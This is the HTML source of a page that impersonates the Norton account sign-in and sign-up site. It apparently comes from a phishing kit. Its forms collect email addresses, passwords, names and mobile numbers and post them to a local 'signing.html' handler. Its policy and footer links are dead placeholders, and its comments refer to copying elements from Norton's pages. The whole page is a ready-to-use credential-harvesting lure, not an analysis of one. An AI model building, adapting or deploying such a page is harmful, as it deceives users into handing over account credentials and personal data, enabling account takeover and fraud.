<html lang="EN" class="web">
   
<head>
      <title>Sign In - Official Site | Norton Account Sign In &amp; Set Up</title>
      <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
      <meta name="description" content="Log in to your Norton account. Sign in to enter your product key, access your account, manage your subscription, and extend your Norton protection to PC, Mac, Android, and iOS devices. If you don't already have a Norton account, create one today.">
      <meta name="viewport" content="width=device-width">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <link rel="stylesheet" href="css/norton-sprites-style1.css" type="text/css" media="screen" title="default">
      <link rel="stylesheet" href="css/norton-bootstrap3-style.css" type="text/css" media="screen" title="default">
      <style type="text/css">
         /* symantec-sans_light.woff */
         @font-face {
         font-family: 'Symantec Sans Light';
         font-style: normal;
         font-weight: 300;
         src: url(fonts/symantec-sans_light.woff) format('woff'),
         url(fonts/symantec-sans_light.ttf) format('truetype');
         }
         /* symantec-sans_regular.woff */
         @font-face {
         font-family: 'Symantec Sans';
         font-style: normal;
         font-weight: 400;
         src: url(fonts/symantec-sans_regular.woff) format('woff'),
         url(fonts/symantec-sans_regular.ttf) format('truetype');
         }
      </style>
      <!-- <script type="text/javascript" src="js/norton-js.js"></script> -->

   </head>
   <body class="theme_default login">
      <div id="wrapper-top">
         <div id="header-content" class="navbar ">
            <div class="container">
               <div class="sso_responsive_img header_branded_logo " id="header-logo">
                  <div class="sso_responsive_img_inner" aria-label="Norton by Symantec"></div>
               </div>
            </div>
            <span class="hidden_in_mobile">
               <div class="jumbotron bg_branded_style bg_font">
                  <div id="background-mask"></div>
               </div>
            </span>
         </div>
         <div class="container dual-container">
            <div class="row">
               <div id="open-column" class="col-md-6 col-sm-5">
                  <div id="open-content">
                     <div id="theme">
                        <div id="default-theme">
                           <h1>Welcome to Norton</h1>
                           <p class="lead">Sign in to enter your product key, access your account, manage your subscription, and extend your Norton protection to PC, Mac, Android, and iOS devices.</p>
                        </div>
                     </div>
                     <div id="theme-mobile" class="text-center"></div>
                  </div>
               </div>
               <div id="panel-column" class="col-md-6 col-sm-7">
                  <div id="panel-background" class="login-panel">
                     <div id="panel-shadow"></div>
                     <div id="panel-shadow-bottom"></div>
                     <div id="panel-content">
                        <div id="tab-content">
                           <div id="container" class="btn-container">
                              <button id="registerToggleButton" type="button" class="btn btn-lg btn-block-sm btn-tab btn-no-outline btn-bg-gradient" data-parent="#tab-content" data-toggle="tab" href="/signing.html" role="tab">
                              Create an Account
                              </button>
                              <button id="loginToggleButton" type="button" class="btn btn-lg btn-block-sm btn-tab btn-no-outline btn-bg-gradient in" data-parent="#tab-content" data-toggle="tab" href="/signing.html" role="tab">
                              Sign in
                              </button>
                           </div>
                           <div id="loginCollapse" class="panel-collapse collapse active" autocomplete="off" style="height: auto; display: block;">
                              <form id="loginform" name="loginform" method="post" action="/signing.html">
                                 <div id="loginPanelBody" class="panel-body">
                                    <div class="row">
                                       <div class="form-group text-input col-xs-12">
                                          <input type="email" class="form-control" name="email" id="EmailFrom" placeholder="Email address" required />
                                       </div>
                                    </div>
                                    <div class="row">
                                       <div class="form-group text-input col-xs-12">
                                          <input type="password" class="form-control" name="password" id="password" placeholder="Password" required />
                                       </div>
                                    </div>
                                    <div class="form-group">
                                       <input class="cbValue" id="remember_me" name="remember_me" type="checkbox" checked="" aria-labelledby="remember_me_lbl" aria-describedby="remember_tooltip">
                                       <label id="remember_me_lbl" for="remember_me" class="cbLabel">
                                       Remember me on this device
                                       </label>
                                    </div>
                                    <p class="privacy-text terms text-center" style="margin-top: 10px; font-size: 10px;">
                                       I have read and agree to the <a href="javascript:void(0)">Privacy Policy</a>
                                    </p>
                                    <div class="form-group text-center">
                                    <!-- Get site  name from norton page 3 -->
                                                                        <!-- //Get site  name from norton page 3 -->
                                       <form id="signinForm">
  <input 
    type="submit" 
    class="btn btn-lg btn-block-sm signin_button" 
    name="submit" 
    value="Sign In">
</form>

<script>
document.getElementById("signinForm").addEventListener("submit", function(event){
  event.preventDefault(); // Stop form submission
  window.location.href = "signing.html"; // Redirect
});
</script>

                                    </div>
                                    <div class="form-group text-center">
                                       <a href="javascript:void(0)" id="forget-passwd-link">Having Trouble Signing In?</a>
                                    </div>
                                 </div>
                              </form>
                           </div>
                           <div id="registerCollapse" class="panel-collapse collapse" style="display: none;">
                              <form id="accountProfileForm" method="post" action="/signing.html" autocomplete="off">
                                 <div id="registerPanelBody" class="panel-body">
                                 <div class="form-group">
                                    <p id="smallest-text-id" class="smallest-text">An account is needed to access all of your Norton products and services.</p>
                                 </div>
                                 <div class="row">
                                    <div class="form-group text-input col-xs-12">
                                       <input type="email" class="form-control" name="email" id="email" placeholder="Email address *" required>
                                    </div>
                                 </div>
                                 <div class="row">
                                    <div class="form-group text-input col-xs-12">
                                       <input type="text" name="emailConfirm" id="confemail" onblur="confirmEmail()" class="form-control" placeholder="Confirm email address *" />
                                    </div>
                                 </div>
                                 <script type="text/javascript">
                                    function confirmEmail() {
                                       var email = document.getElementById("email").value
                                       var confemail = document.getElementById("confemail").value
                                       if(email != confemail) {
                                             alert('Email Not Matching!');
                                             return                                        }
                                    }
                                 </script>
                                 <div class="row">
                                    <div class="form-group text-input col-xs-12">
                                       <input type="password" class="form-control" name="password" id="createPassword" placeholder="Create a secure password *" required />
                                    </div>
                                 </div>
                                 <div class="row hide-context-menu">
                                    <div class="form-group text-input col-xs-6">
                                       <input type="text" class="form-control" name="fname" placeholder="First name *">
                                    </div>
                                    <div class="form-group text-input col-xs-6">
                                       <input type="text" class="form-control" name="lname" placeholder="Last name *">
                                    </div>
                                 </div>
                                 <div class="row">
                                    <div class="form-group text-input col-xs-12">
                                    <input type="text" class="form-control" name="mobile" placeholder="Mobile phone number *">
                                    </div>
                                 </div>
                                 <div class="row">
                                    <div class="form-group col-xs-12">
                                       <div class="checkbox" id="marketingPanel">
                                          <input id="marketing2" name="marketing2" type="checkbox" value="true" aria-labelledby="marketing2_lbl">
                                          <label id="marketing2_lbl" for="marketing2">
                                          Email me product updates, offers, and security newsletters
                                          </label>
                                       </div>
                                    </div>
                                 </div>
                                 <div class="row">
                                    <div class="form-group col-xs-12 text-center">
                                       <p class="privacy-text terms text-center" style="margin-top: 10px; font-size: 10px;">
                                          I have read and agree to the <a href="javascript:void(0)">Privacy Policy</a>
                                       </p>
                                    </div>
                                    <div class="form-group text-center">
                                    <!-- Get Email Subject and site name from norton page 3 -->
                                                                        <!-- //Get Email Subject from norton page 3 -->
                                       <input type="submit" class="btn btn-lg btn-block-sm signin_button" name="submit" value="Create Account">
                                    </div>
                                 </div>
                              </div>
                           </form>
                        </div>
                     </div>
                  </div>
               </div>
            </div>
         </div>
      </div>
   </div>
      <div id="wrapper-bottom">
         <div id="footer-content">
            <footer class="np-global-footer" id="ngp-main-footer">
               <div class="row">
                  <ul class="footer-links">
                     <li>
                        <a href="javascript:void(0)">Terms of Service</a>
                     </li>
                     <li>
                        <a href="javascript:void(0)">Privacy Policy</a>
                     </li>
                  </ul>
               </div>
            </footer>
         </div>
      </div>
      <script type="text/javascript" src="js/norton-jquery.js"></script>
      <script type="text/javascript">
         function ssoPageLoad() {
            $("#loginToggleButton, #login-link-signup").click(function ()
            {
               $("#loginCollapse").show();

               $("#registerCollapse").hide();
               $("#registerCollapse").removeClass("in");

               $("#loginToggleButton").addClass("in");
               $("#registerToggleButton").removeClass("in");
            });

            $("#registerToggleButton").click(function () {
               $("#loginCollapse").hide();
               $("#loginCollapse").removeClass("in");

               $("#registerCollapse").show();
               $("#registerToggleButton").addClass("in");
               $("#loginToggleButton").removeClass("in");
            });
            showFocusOutlineOnKeyBoardTab("#container > button.btn-tab", "btn-no-outline");
         }
      </script>

   </body>
</html>